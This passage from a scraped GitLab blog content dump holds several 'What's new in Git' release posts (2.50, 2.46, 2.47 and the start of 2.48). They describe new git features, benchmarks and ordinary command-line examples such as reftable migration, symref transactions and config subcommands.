73.618 s    10 runs\n\nBenchmark 6: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none\n   Time (mean ± σ):     13.032 s ±  0.072 s    [User: 11.638 s, System: 1.368 s]\n   Range (min … max):   12.960 s … 13.199 s    10 runs\n\nSummary\n   git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag\n    74.75 ± 4.61 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit\n   538.17 ± 33.17 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree\n   627.98 ± 38.77 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none\n  3244.93 ± 257.23 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob\n  3990.07 ± 392.72 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter\n```\n\nInterestingly, these results indicate that the computation time now scales with\nthe number of objects for a given type instead of the number of total objects\nin the packfile. The original mailing-list thread can be found\n[here](https://lore.kernel.org/git/20250221-pks-cat-file-object-type-filter-v1-0-0852530888e2@pks.im/).\n\n_This project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab)._\n\n## Improved performance when generating bundles\n\nGit provides a means to generate an archive of a repository which contains a\nspecified set of references and accompanying reachable objects via the\n[`git-bundle(1)`](https://git-scm.com/docs/git-bundle) command. This operation\nis used by GitLab to generate repository backups and also as part of the\n[bundle-URI](https://git-scm.com/docs/bundle-uri) mechanism.\n\nFor large repositories containing millions of references, this operation can\ntake hours or even days. 
For example, with the main GitLab repository\n([gitlab-org/gitlab](https://gitlab.com/gitlab-org/gitlab)), backup times were\naround 48 hours. Investigation revealed there was a performance bottleneck due\nto how Git was performing a check to avoid duplicated references being included\nin the bundle. The implementation used a nested `for` loop to iterate and\ncompare all listed references, leading to O(N^2) time complexity. This scales\nvery poorly as the number of references in a repository increases.\n\nIn this release, this issue was addressed by replacing the nested loops with a\nmap data structure leading to a significant speedup. The following benchmark shows\nthe performance improvement for creating a bundle with a repository containing\n100,000 references:\n\n```text\nBenchmark 1: bundle (refcount = 100000, revision = master)\n  Time (mean ± σ):     14.653 s ±  0.203 s    [User: 13.940 s, System: 0.762 s]\n  Range (min … max):   14.237 s … 14.920 s    10 runs\n\nBenchmark 2: bundle (refcount = 100000, revision = HEAD)\n  Time (mean ± σ):      2.394 s ±  0.023 s    [User: 1.684 s, System: 0.798 s]\n  Range (min … max):    2.364 s …  2.425 s    10 runs\n\nSummary\n  bundle (refcount = 100000, revision = HEAD) ran\n    6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)\n```\n\nTo learn more, check out our blog post\n[How we decreased GitLab repo backup times from 48 hours to 41 minutes](https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes/).\nYou can also find the original mailing list thread\n[here](https://lore.kernel.org/git/20250401-488-generating-bundles-with-many-references-has-non-linear-performance-v1-0-6d23b2d96557@gmail.com/).\n\n_This project was led by [Karthik Nayak](https://gitlab.com/knayakgl)._\n\n## Better bundle URI unbundling\n\nThrough the [bundle URI](https://git-scm.com/docs/bundle-uri) mechanism in Git,\nlocations to fetch bundles from can be provided to clients with the 
goal to\nhelp speed up clones and fetches. When a client downloads a bundle, references\nunder `refs/heads/*` are copied from the bundle into the repository along with\ntheir accompanying objects. A bundle might contain additional references\noutside of `refs/heads/*` such as `refs/tags/*`, which are simply ignored when\nusing bundle URI on clone.\n\nIn Git 2.50, this restriction is lifted, and all references\nmatching `refs/*` contained in the downloaded bundle are copied.\n[Scott Chacon](https://github.com/schacon), who contributed this functionality,\ndemonstrates the difference when cloning\n[gitlab-org/gitlab-foss](https://gitlab.com/gitlab-org/gitlab-foss):\n\n```shell\n$ git-v2.49 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.49\nCloning into 'gl-2.49'...\nremote: Enumerating objects: 1092703, done.\nremote: Counting objects: 100% (973405/973405), done.\nremote: Compressing objects: 100% (385827/385827), done.\nremote: Total 959773 (delta 710976), reused 766809 (delta 554276), pack-reused 0 (from 0)\nReceiving objects: 100% (959773/959773), 366.94 MiB | 20.87 MiB/s, done.\nResolving deltas: 100% (710976/710976), completed with 9081 local objects.\nChecking objects: 100% (4194304/4194304), done.\nChecking connectivity: 959668, done.\nUpdating files: 100% (59972/59972), done.\n\n$ git-v2.50 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.50\nCloning into 'gl-2.50'...\nremote: Enumerating objects: 65538, done.\nremote: Counting objects: 100% (56054/56054), done.\nremote: Compressing objects: 100% (28950/28950), done.\nremote: Total 43877 (delta 27401), reused 25170 (delta 13546), pack-reused 0 (from 0)\nReceiving objects: 100% (43877/43877), 40.42 MiB | 22.27 MiB/s, done.\nResolving deltas: 100% (27401/27401), completed with 8564 local objects.\nUpdating files: 100% (59972/59972), done.\n```\n\nComparing these results, we see that Git 2.50 fetches 43,877 objects\n(40.42 MiB) 
after the bundle was extracted whereas Git 2.49 fetches a\ntotal of 959,773 objects (366.94 MiB). Git 2.50 fetches roughly 95% fewer\nobjects and 90% less data, which benefits both the client and the server. The\nserver needs to send a lot less data to the client and the client needs to\ndownload and extract less data. In the example provided by Scott this led to a\nspeedup of 25%.\n\nTo learn more, check out the corresponding\n[mailing-list thread](https://lore.kernel.org/git/pull.1897.git.git.1740489585344.gitgitgadget@gmail.com/).\n\n_This patch series was contributed by [Scott Chacon](https://github.com/schacon)._\n\n## Read more\n\nThis article highlighted just a few of the contributions made by GitLab and\nthe wider Git community for this latest release. You can learn about these from\nthe [official release announcement](https://lore.kernel.org/git/xmqq1prj1umb.fsf@gitster.g/) of the Git project. Also, check\nout our [previous Git release blog posts](https://about.gitlab.com/blog/tags/git/)\nto see other past highlights of contributions from GitLab team members.\n","2025-06-16",[751,9,267],{"featured":91,"template":689,"slug":5309},"what-s-new-in-git-2-50-0","content:en-us:blog:what-s-new-in-git-2-50-0.yml","What S New In Git 2 50 0","en-us/blog/what-s-new-in-git-2-50-0.yml","en-us/blog/what-s-new-in-git-2-50-0",{"_path":5315,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5316,"content":5321,"config":5326,"_id":5328,"_type":14,"title":5329,"_source":16,"_file":5330,"_stem":5331,"_extension":19},"/en-us/blog/whats-new-in-git-2-46-0",{"title":5317,"description":5318,"ogTitle":5317,"ogDescription":5318,"noIndex":6,"ogImage":2047,"ogUrl":5319,"ogSiteName":673,"ogType":674,"canonicalUrls":5319,"schema":5320},"What’s new in Git 2.46.0?","Here are highlights of release contributions from GitLab's Git team and the wider Git community, including reference backend migration tooling and transactional symbolic reference 
updates.","https://about.gitlab.com/blog/whats-new-in-git-2-46-0","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What’s new in Git 2.46.0?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Justin Tobler\"}],\n        \"datePublished\": \"2024-07-29\",\n      }",{"title":5317,"description":5318,"authors":5322,"heroImage":2047,"date":5323,"body":5324,"category":10,"tags":5325},[5303],"2024-07-29","The Git project recently released [Git v2.46.0](https://lore.kernel.org/git/xmqqzfq0i0qa.fsf@gitster.g/T/#u). Let's look at a few notable highlights from this release, which includes contributions from GitLab's Git team and the wider Git community.\n\n## Tooling to migrate reference backends\n\nIn the previous [Git 2.45.0](https://gitlab.com/gitlab-org/git/-/raw/master/Documentation/RelNotes/2.45.0.txt?ref_type=heads)\nrelease, the reftables format was introduced as a new backend for storing\nreferences. This new reference format solves some challenges that large\nrepositories face as the number of references scales. If you are not yet\nfamiliar with the reftables backend, check out our previous [Git release blog post](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/) where the feature was introduced and our beginner’s guide to [learn more about how reftables work](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/).\n\nThe reftable backend has a different on-disk format than the pre-existing files backend. Consequently, to use reftables on an existing repository requires a conversion between the different formats. To accomplish this, a new git-refs(1) command has been introduced with the `migrate` subcommand to perform reference backend migrations. 
Below is an example of how this command can be used.\n\n```shell\n# Initialize a new repository as “bare” so it does not contain reflogs.\n$ git init --bare .\n$ git commit --allow-empty -m \"init\"\n# Populate repository with references in the files backend.\n$ git branch foo\n$ git branch bar\n$ tree .git/refs\n.git/refs\n├── heads\n│   ├── bar\n│   ├── foo\n│   ├── main\n└── tags\n# Perform reference migration to reftables format.\n$ git refs migrate --ref-format=reftable\n# Check that reftables backend is now in use.\n$ tree .git/reftable\n.git/reftable\n├── 0x000000000001-0x000000000001-a3451eed.ref\n└── tables.list\n# Check the repository config to see the updated `refstorage` format.\n$ cat config\n[core]\n        repositoryformatversion = 1\n        filemode = true\n        bare = true\n        ignorecase = true\n        precomposeunicode = true\n[extensions]\n        refstorage = reftable\n```\n\nOnce a repository has been migrated, the on-disk format is changed to begin\nusing the reftable backend. Git operations on the repository continue to\nfunction and interact with remotes the same as before. The migration only\naffects how references are stored internally for the repository. If you wish to go back to the files reference backend, you can accomplish this with the same command by instead specifying `--ref-format=files`.\n\nThe migration tooling currently has some notable limitations. The reflogs in a repository are a component of a reference backend and would also require\nmigration between formats. Unfortunately, the tooling is not yet capable of\nconverting reflogs between the files and reftables backends. Also, a repository with worktrees essentially has multiple ref stores and the migration tool is not yet capable of handling this scenario. Therefore, if a repository contains reflogs or worktrees, reference migration is currently unavailable. 
These limitations may be overcome in future versions.\n\nBecause a bare Git repository does not have reflogs, it is easier to migrate. To migrate a standard non-bare repository, reflogs must be pruned first. Therefore, any repository without reflogs or worktrees can be migrated. With these limitations in mind, this tool can be used to begin taking advantage of the reftables backend in your existing repositories.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Transactional symref updates\n\nThe [git-update-ref(1)](https://git-scm.com/docs/git-update-ref) command\nperforms reference updates in a Git repository. These reference updates can also be performed atomically in bulk with transactions by using\n`git update-ref --stdin` and passing update-ref instructions on stdin. Below is an example of how this is done.\n\n```shell\n$ git init .\n$ git branch -m main\n$ git commit --allow-empty -m \"foo\" && git commit --allow-empty -m \"bar\"\n# Retrieve the object ID of the two commits created.\n$ git rev-parse main~ main\n567aac2b3d1fbf0bd2433f669eb0b82a0348775e\n3b13462a9a42e0a3130b9cbc472ab479d3ef0631\n# Start transaction, provide update-ref instructions, and commit.\n$ git update-ref --stdin \u003C\u003CEOF\n> start\n> create refs/heads/new-ref 3b13462a9a42e0a3130b9cbc472ab479d3ef0631\n> update refs/heads/main 567aac2b3d1fbf0bd2433f669eb0b82a0348775e\n> commit\n> EOF\n$ git for-each-ref\n567aac2b3d1fbf0bd2433f669eb0b82a0348775e commit refs/heads/main\n3b13462a9a42e0a3130b9cbc472ab479d3ef0631 commit refs/heads/new-ref\n```\n\nFrom this example, once the transaction is committed, a new branch is created pointing to the “bar” commit and the main branch is updated to point to the previous “foo” commit. Committing the transaction performs the specified reference updates atomically. 
If an individual reference update fails, the transaction is aborted and no reference updates are performed.\n\nA notable absence here is instructions to support symref updates in these\ntransactions. If a user wants to update a symref along with other references\natomically in the same transaction, there is no tooling to do so. In this\nrelease, the `symref-create`, `symref-update`, `symref-delete`, and\n`symref-verify` instructions are introduced to provide this functionality.\n\n```shell\n# Create a symref that will be updated during the next operation.\n$ git symbolic-ref refs/heads/symref refs/heads/main\n# The --no-deref flag is required to ensure the symref itself is updated.\n$ git update-ref --stdin --no-deref \u003C\u003CEOF\n> start\n> symref-create refs/heads/new-symref refs/heads/main\n> symref-update refs/heads/symref refs/heads/new-ref\n> commit\n> EOF\n$ git symbolic-ref refs/heads/symref\nrefs/heads/new-ref\n$ git symbolic-ref refs/heads/new-symref\nrefs/heads/main\n```\n\nFrom the above example, a new symbolic reference is created and another is\nupdated in a transaction. These new symref instructions can be used in\ncombination with the pre-existing instructions to perform all manner of\nreference updates now in a single transaction. Check out the\n[documentation](https://git-scm.com/docs/git-update-ref) for more information regarding each of these new instructions.\n\nThis project was led by [Karthik Nayak](https://gitlab.com/knayakgl).\n\n## UX improvements for git-config(1)\n\nThe git-config(1) command allows repository and global options to be viewed and configured. The modes used to interact with configuration can be selected explicitly using flags or determined implicitly based on the number of arguments provided to the command. 
For example:\n\n```shell\n$ git config --list\n# Explicit retrieval of username configuration\n$ git config --get user.name\n# Implicit retrieval of username configuration\n$ git config user.name\n# Explicit setting of username configuration\n$ git config --set user.name \"Sidney Jones\"\n# Implicit setting of username configuration\n$ git config user.name \"Sidney Jones\"\n# An optional third argument is also accepted. What do you think this does?\n$ git config \u003Cname> [\u003Cvalue> [\u003Cvalue-pattern>]]\n```\n\nOverall, the [git-config(1)](https://git-scm.com/docs/git-config) user\ninterface is not consistent with how other more modern Git commands work where you usually use subcommands. For example, `git remote list`. This release introduces `list`, `get`, `set`, `unset`, `rename-section`, `remove-section`, and `edit` as subcommands for use with the config command while also keeping the old-style syntax available. This change aims to improve user experience by adapting the config command to follow more UI practices and better conform to other commands within Git. For example:\n\n```shell\n$ git config list\n$ git config get user.name\n$ git config set user.name \"Sidney Jones\"\n```\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Addressed performance regression\n\nGit operations that leverage attributes rely on reading `.gitattributes` files found in the repository’s working-tree. This is problematic for bare Git repositories because by definition they lack a working-tree. To get around this, Git has the `attr.tree` configuration that allows a source tree to be specified and used to lookup attributes from.\n\nIn Git release 2.43.0, Git started using the tree of `HEAD` as the source of Git attributes for bare repositories by default. Unfortunately, the additional overhead due to scanning for Git attributes files had severe performance impacts. 
This is because, when `attr.tree` is set, each attribute lookup requires walking the source tree to check for an associated `.gitattributes` file. The larger and deeper the source tree of the repository is, the more pronounced the performance regression becomes. For example, benchmarks run on the linux.git repository showed\ngit-pack-objects(1) taking 1.68 times longer to complete. This could lead to slowdowns when performing clones or fetches.\n\n```\n# attr.tree set to HEAD as done by default in Git version 2.43.0.\nBenchmark 1: git -c attr.tree=HEAD pack-objects --all --stdout \u003C/dev/null >/dev/null\n  Time (mean ± σ):     133.807 s ±  4.866 s    [User: 129.034 s, System: 6.671 s]\n  Range (min … max):   128.447 s … 137.945 s    3 runs\n\n# attr.tree is set to an empty tree to disable attribute lookup as done in Git versions prior to 2.43.0.\nBenchmark 2: git -c attr.tree=4b825dc642cb6eb9a060e54bf8d69288fbee4904 pack-objects --all --stdout \u003C/dev/null >/dev/null\n  Time (mean ± σ):     79.442 s ±  0.822 s    [User: 77.500 s, System: 6.056 s]\n  Range (min … max):   78.583 s … 80.221 s    3 runs\n```\n\nSome of the most notable Git commands that were affected were `clone`, `pull`, `fetch`, and `diff` when, as previously mentioned, used on repositories with large or deep trees. Consequently, the `attr.tree` configuration was partially reverted to no longer be set to `HEAD` by default to address the performance regression. To learn more, check out this\n[thread](https://lore.kernel.org/git/CAKOHPAn1btewYTdLYWpW+fOaXMY+JQZsLCQxUSwoUqnnFN_ohA@mail.gmail.com/) on the mailing list.\n\n## Unit-test migration\n\nHistorically, testing in the Git project has been done via end-to-end tests\nimplemented as shell scripts. The Git project has relatively recently\nintroduced a unit-testing framework written in C. 
This new testing framework\nbrings opportunities for more in-depth testing of low-level implementation\ndetails at the individual function call level and helps complement the existing end-to-end tests. There are some existing end-to-end tests that are a better fit as unit-tests and thus are good candidates to be ported.\n\nThis year, GitLab is again helping mentor [Google Summer of Code (GSoC)](https://summerofcode.withgoogle.com/) contributors working in the Git project. Thanks to efforts from these ongoing GSoC projects and also the wider Git community, some existing tests are being refactored and migrated to the unit-testing framework. During this last release cycle, there have been several contributions towards the goal of improving the testing in the Git project. To follow development progress for these GSoC contributor projects, check out [Chandra’s](https://chand-ra.github.io/) and [Ghanshyam’s](https://spectre10.github.io/posts/) blogs.\n\n## Bundle URI fixes\n\nUsually when a client fetches from a remote repository, all required objects\nare sent in a packfile computed by the remote server. To avoid some of this\ncomputation, servers can opt to advertise prebuilt “bundles” stored separately from the remote server which contain sets of references and objects that the client may need. The client can fetch these bundles first through a mechanism called [bundle-uri](https://git-scm.com/docs/bundle-uri).\n\nThanks to [Xing Xin](https://lore.kernel.org/git/pull.1730.git.1715742069966.gitgitgadget@gmail.com/), an issue was identified and fixed where Git, despite having downloaded some bundles, was still downloading everything from the remote as if there were no bundles. This was due to Git not correctly discovering all the downloaded bundles, which resulted in having to fetch the consecutive ones from the remote. 
With this fixed, remotes using the bundle-uri mechanism can avoid having to perform redundant work and improve performance.\n\n## Read more\n\nThis article highlighted just a few of the contributions made by GitLab and\nthe wider Git community for this latest release. You can learn about these from the [official release announcement](https://lore.kernel.org/git/xmqqzfq0i0qa.fsf@gitster.g/T/#u) of the Git project. Also, check out our [previous Git release blog posts](https://about.gitlab.com/blog/tags/git/) to see other past highlights of contributions from GitLab team members.",[751,9,267],{"slug":5327,"featured":91,"template":689},"whats-new-in-git-2-46-0","content:en-us:blog:whats-new-in-git-2-46-0.yml","Whats New In Git 2 46 0","en-us/blog/whats-new-in-git-2-46-0.yml","en-us/blog/whats-new-in-git-2-46-0",{"_path":5333,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5334,"content":5340,"config":5345,"_id":5347,"_type":14,"title":5348,"_source":16,"_file":5349,"_stem":5350,"_extension":19},"/en-us/blog/whats-new-in-git-2-47-0",{"title":5335,"description":5336,"ogTitle":5335,"ogDescription":5336,"noIndex":6,"ogImage":5337,"ogUrl":5338,"ogSiteName":673,"ogType":674,"canonicalUrls":5338,"schema":5339},"What's new in Git 2.47.0?","Learn about the latest version of Git, including new global variables to configure reference and object hash formats. 
Discover contributions from GitLab's Git team and the wider Git community.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663691/Blog/Hero%20Images/AdobeStock_752438815.jpg","https://about.gitlab.com/blog/whats-new-in-git-2-47-0","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What's new in Git 2.47.0?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Justin Tobler\"}],\n        \"datePublished\": \"2024-10-07\",\n      }",{"title":5335,"description":5336,"authors":5341,"heroImage":5337,"date":5342,"body":5343,"category":10,"tags":5344},[5303],"2024-10-07","The Git project recently released [Git v2.47.0](https://lore.kernel.org/git/xmqqa5fg9bsz.fsf@gitster.g/).\nLet's look at a few notable highlights from this release, which includes\ncontributions from GitLab's Git team and the wider Git community.\n\n## New global configuration options\n\nIf you have been following recent Git releases, you are probably familiar with the new \"reftable\" reference backend that became available with\n[Git version 2.45](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/). Check out our [Beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/) to learn more. Previously, in order to initialize a repository with the \"reftable\" format, the `--ref-format` option needed to be passed to git-init(1):\n\n```sh\n$ git init --ref-format reftable\n```\n\nWith the 2.47 release, Git now has the `init.defaultRefFormat` configuration\noption, which tells Git which reference backend to use when initializing a\nrepository. This can be used to override the default \"files\" backend and begin using the \"reftable\" backend. 
To configure, execute the following:\n\n```sh\n$ git config set --global init.defaultRefFormat reftable\n```\n\nAs some of you may know, the object hash format used by Git repositories is\nalso configurable. By default, repositories are initialized to use the SHA-1\nobject format. An alternative is the SHA-256 format, which is more secure and future-proof. You can read more about this in one of our\n[previous blog posts on SHA-256 support in Gitaly](https://about.gitlab.com/blog/sha256-support-in-gitaly/#what-is-sha-256%3F). A SHA-256 repository can be created by passing the `--object-format` option to git-init(1):\n\n```sh\n$ git init --object-format sha256\n```\n\nIn this Git release another configuration option, `init.defaultObjectFormat`, has been added. This option tells Git which object format to use by default when initializing a repository. To configure, execute the following:\n\n```sh\n$ git config set --global init.defaultObjectFormat sha256\n```\n\nSomething to note, SHA-256 repositories are not interoperable with SHA-1\nrepositories and not all forges support hosting SHA-256 repositories. GitLab\nrecently announced [experimental support for SHA-256 repositories](https://about.gitlab.com/blog/gitlab-now-supports-sha256-repositories/) if you want to try it out.\n\nThese options provide a useful mechanism to begin using these repository\nfeatures without having to consciously think about it every time you initialize a new repository.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## New subcommand for git-refs(1)\n\nIn the previous Git release, the [git-refs(1)](https://git-scm.com/docs/git-refs) command was introduced to provide low-level access to references in a\nrepository and provided the \"migrate\" subcommand to convert between reference backends. This release adds a new \"verify\" subcommand which allows the user to check the reference database for consistency. 
To verify the consistency of a repository, we often execute [git-fsck(1)](https://git-scm.com/docs/git-fsck).\n\nNotably, this command does not explicitly verify the reference database of the repository though. With the introduction of the \"reftable\" reference format, which is a binary format and thus harder to inspect manually, it is now even more important that tooling be established to fill this gap. Let's set up a repository with an invalid reference to demonstrate:\n\n```sh\n# The \"files\" backend is used so we can easily create an invalid reference.\n$ git init --ref-format files\n$ git commit --allow-empty -m \"init\"\n# A lone '@' is not a valid reference name.\n$ cp .git/refs/heads/main .git/refs/heads/@\n$ git refs verify\nerror: refs/heads/@: badRefName: invalid refname format\n```\n\nWe can see the invalid reference was detected and an error message printed to the user. While this tooling is not something the end-user will likely run, it is particularly useful on the server side to ensure repositories remain consistent. Eventually, the goal is to integrate this command as part of git-fsck(1) to provide a unified way to execute repository consistency checks.\n\nThis project was led by Jialuo She as part of the Google Summer of Code. To\nlearn more, you can read Jialuo's [GSoC report](https://luolibrary.com/2024/08/25/GSoC-Final-Report/).\n\n## Ongoing reftables work\n\nThis release also includes fixes for some bugs found in the \"reftable\" backend. One of these bugs is particularly interesting and revolves around how table compaction was being performed.\n\nAs you may recall, the reftable backend consists of a series of tables\ncontaining the state of all the references in the repository. Each atomic set of reference changes results in a new table being written and recorded in the \"tables.list\" file. To reduce the number of tables present, after each reference update, the tables are compacted to follow a geometric sequence by file size. 
After the tables are compacted, the \"tables.list\" file is updated to reflect the new on-disk state of the reftables.\n\nBy design, concurrent table writes and compaction is allowed. Synchronization at certain points is controlled through the use of lock files. For example, when compaction is starting the \"tables.list\" file is initially locked so the file can be consistently read and the tables requiring compaction can also be locked. Since the actual table compaction can take a while the lock is released, allowing concurrent writes to proceed. This is safe because concurrent writers know that they must not modify the now-locked tables which are about to be compacted. When the newly compacted tables have finished being written, the \"tables.list\" file is locked again and this time it is updated to reflect the new table state.\n\nThere is a problem though: What happens if a concurrent reference update writes a new table to the \"tables.list\" in the middle of table compaction after the initial lock was released, but before the new list file was written? If this race were to occur, the compacting process would not know about the new table and consequently rewrite the \"tables.list\" file without the new table. This effectively drops the concurrent update and could result in references not being added, updated, or removed as expected.\n\nLuckily, the fix to remediate this problem is rather straightforward. When the compacting process acquires the lock to write to the \"tables.list\" it must first check if any updates to the file have occurred and reload the file. Doing so ensures any concurrent table updates are also reflected appropriately. 
For more information on this fix, check out the corresponding\n[mailing-list thread](https://lore.kernel.org/git/cover.1722435214.git.ps@pks.im/).\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Fixes for git-maintenance(1)\n\nAs a repository grows, it is important that it is properly maintained. By\ndefault, Git executes\n[git-maintenance(1)](https://git-scm.com/docs/git-maintenance) after certain\noperations to keep the repository healthy. To avoid performing unnecessary\nmaintenance, the `--auto` option is specified which uses defined heuristics to determine whether maintenance tasks should be run. The command can be\nconfigured to perform various different maintenance tasks, but by default, it simply executes [git-gc(1)](https://git-scm.com/docs/git-gc) in the background and allows the user to carry on with their business.\n\nThis works as expected until maintenance is configured to perform non-default maintenance tasks. When this happens the configured maintenance tasks are performed in the foreground and the initial maintenance process doesn't exit until all tasks complete. Only the \"gc\" task detaches into the background as expected. It turns out this was because git-gc(1), when run with `--auto`, was accidentally detaching itself, and other maintenance tasks had no means to do so. This had the potential to slow down certain Git commands as auto-maintenance had to run to completion before they could exit.\n\nThis release addresses this issue by teaching git-maintenance(1) the `--detach` option, which allows the whole git-maintenance(1) process to run in the background instead of individual tasks. The auto-maintenance performed by Git was also updated to use this new option. 
For more information on this fix, check out the [mailing-list thread](https://lore.kernel.org/git/cover.1723533091.git.ps@pks.im/).\n\nA little earlier it was mentioned that the auto-maintenance uses a set of\nheuristics to determine whether or not certain maintenance operations should be performed. Unfortunately for the \"files\" reference backend, when\n[git-pack-refs(1)](https://git-scm.com/docs/git-pack-refs) executes with the\n`--auto` option, there is no such heuristic and loose references are\nunconditionally packed into a \"packed-refs\" file. For repositories with many\nreferences, rewriting the \"packed-refs\" file can be quite time-consuming.\n\nThis release also introduces a heuristic that decides whether it should pack\nloose references in the \"files\" backend. This heuristic takes into account the size of the existing \"packed-refs\" file and the number of loose references present in the repository. The larger the \"packed-refs\" file gets, the higher the threshold for the number of loose references before reference packing occurs. This effectively makes reference packing in the \"files\" backend less aggressive while still keeping the repository in a maintained state. Check out the [mailing-list thread](https://lore.kernel.org/git/cover.1725280479.git.ps@pks.im/)\nfor more info.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Code refactoring and maintainability improvements\n\nIn addition to functional changes, there is also work being done to refactor\nand clean up the code. These improvements are also valuable because they help move the project closer toward the longstanding goal of libifying its internal components. To read more, here is a recent\n[update thread](https://lore.kernel.org/git/eoy2sjhnul57g6crprxi3etgeuacjmgxpl4yllstih7woyuebm@bd62ib3fi2ju/) regarding libification.\n\nOne area of improvement has been around resolving memory leaks. The Git project has quite a few memory leaks. 
For the most part, these leaks don't cause much trouble because usually a Git process only runs for a short amount of time and the system cleans up after, but in the context of libification it becomes something that should be addressed. Tests in the project can be compiled with a leak sanitizer to detect leaks, but due to the presence of existing leaks, it is difficult to validate and enforce that new changes do not introduce new leaks. There has been an ongoing effort to fix all memory leaks surfaced by existing tests in the project. Leak-free tests are subsequently marked with `TEST_PASSES_SANITIZE_LEAK=true` to indicate that they are expected to be free of leaks going forward. Prior to this release, the project had 223 test files containing memory leaks. This has now been whittled down to just 60 in this release.\n\nAnother ongoing effort has been to reduce the use of global variables\nthroughout the project. One such notorious global variable is `the_repository`, which contains the state of the repository being operated on and is referenced all over the project. This release comes with a number of patches that remove uses of `the_repository` in favor of directly passing the value where needed. Subsystems in the Git project that still depend on `the_repository` have `USE_THE_REPOSITORY_VARIABLE` defined allowing the global to be used. Now the refs, config, and path subsystems no longer rely on its use.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab)\nwith the help of [John Cai](https://gitlab.com/jcaigitlab) and\n[Jeff King](https://github.com/peff).\n\n## Read more\n\nThis blog post highlighted just a few of the contributions made by GitLab and the wider Git community for this latest release. You can learn about these from the [official release announcement](https://lore.kernel.org/git/xmqqa5fg9bsz.fsf@gitster.g/)\nof the Git project. 
Also, check out our [previous Git release blog posts](https://about.gitlab.com/blog/tags/git/)\nto see other past highlights of contributions from GitLab team members.\n\n- [What’s new in Git 2.46.0?](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/)\n- [What's new in Git 2.45.0?](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/)\n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)\n- [Git pull vs. git fetch: What's the difference?](https://about.gitlab.com/blog/git-pull-vs-git-fetch-whats-the-difference/)",[751,9,267],{"slug":5346,"featured":91,"template":689},"whats-new-in-git-2-47-0","content:en-us:blog:whats-new-in-git-2-47-0.yml","Whats New In Git 2 47 0","en-us/blog/whats-new-in-git-2-47-0.yml","en-us/blog/whats-new-in-git-2-47-0",{"_path":5352,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5353,"content":5358,"config":5363,"_id":5365,"_type":14,"title":5366,"_source":16,"_file":5367,"_stem":5368,"_extension":19},"/en-us/blog/whats-new-in-git-2-48-0",{"title":5354,"description":5355,"ogTitle":5354,"ogDescription":5355,"noIndex":6,"ogImage":5337,"ogUrl":5356,"ogSiteName":673,"ogType":674,"canonicalUrls":5356,"schema":5357},"What’s new in Git 2.48.0?","Learn about the latest version of Git, including a new build system and optimization in the new reftable backend. 
Discover contributions from GitLab's Git team and the Git community.","https://about.gitlab.com/blog/whats-new-in-git-2-48-0","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What’s new in Git 2.48.0?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Christian Couder\"}],\n        \"datePublished\": \"2025-01-10\",\n      }",{"title":5354,"description":5355,"authors":5359,"heroImage":5337,"date":5360,"body":5361,"category":10,"tags":5362},[1492],"2025-01-10","The Git project recently released [Git 2.48.0](https://lore.kernel.org/git/xmqqplku7cvm.fsf@gitster.g/). Let's look at a few notable highlights from this release, which includes contributions from GitLab's Git team and the wider Git community.\n\n## Meson build system\n\nFor a long time, Git could be built using either a [Makefile](https://en.wikipedia.org/wiki/GNU_Make)-based build system or an [Autoconf](https://en.wikipedia.org/wiki/Autoconf)-based build system. Git developers have been using mostly the Makefile-based build system, so\n[the Autoconf-based build system has lagged behind](https://lore.kernel.org/git/GV1PR02MB848925A79A9DD733848182D58D662@GV1PR02MB8489.eurprd02.prod.outlook.com/) in features and maintenance. Another issue was that a lot of Windows\ndevelopers use integrated development environments (IDEs) that don’t\nhave good support for Makefile- and Autoconf-based build systems.\n\nIn 2020, support for building Git using [CMake](https://cmake.org/) was added. CMake added better Windows support and IDE integration, especially for Visual\nStudio. Some modern build system features like out-of-source builds were also included.\n\nRecently, it appeared the CMake support was also lagging\nbehind and that it might never be a good option to replace the two other\nbuild systems. 
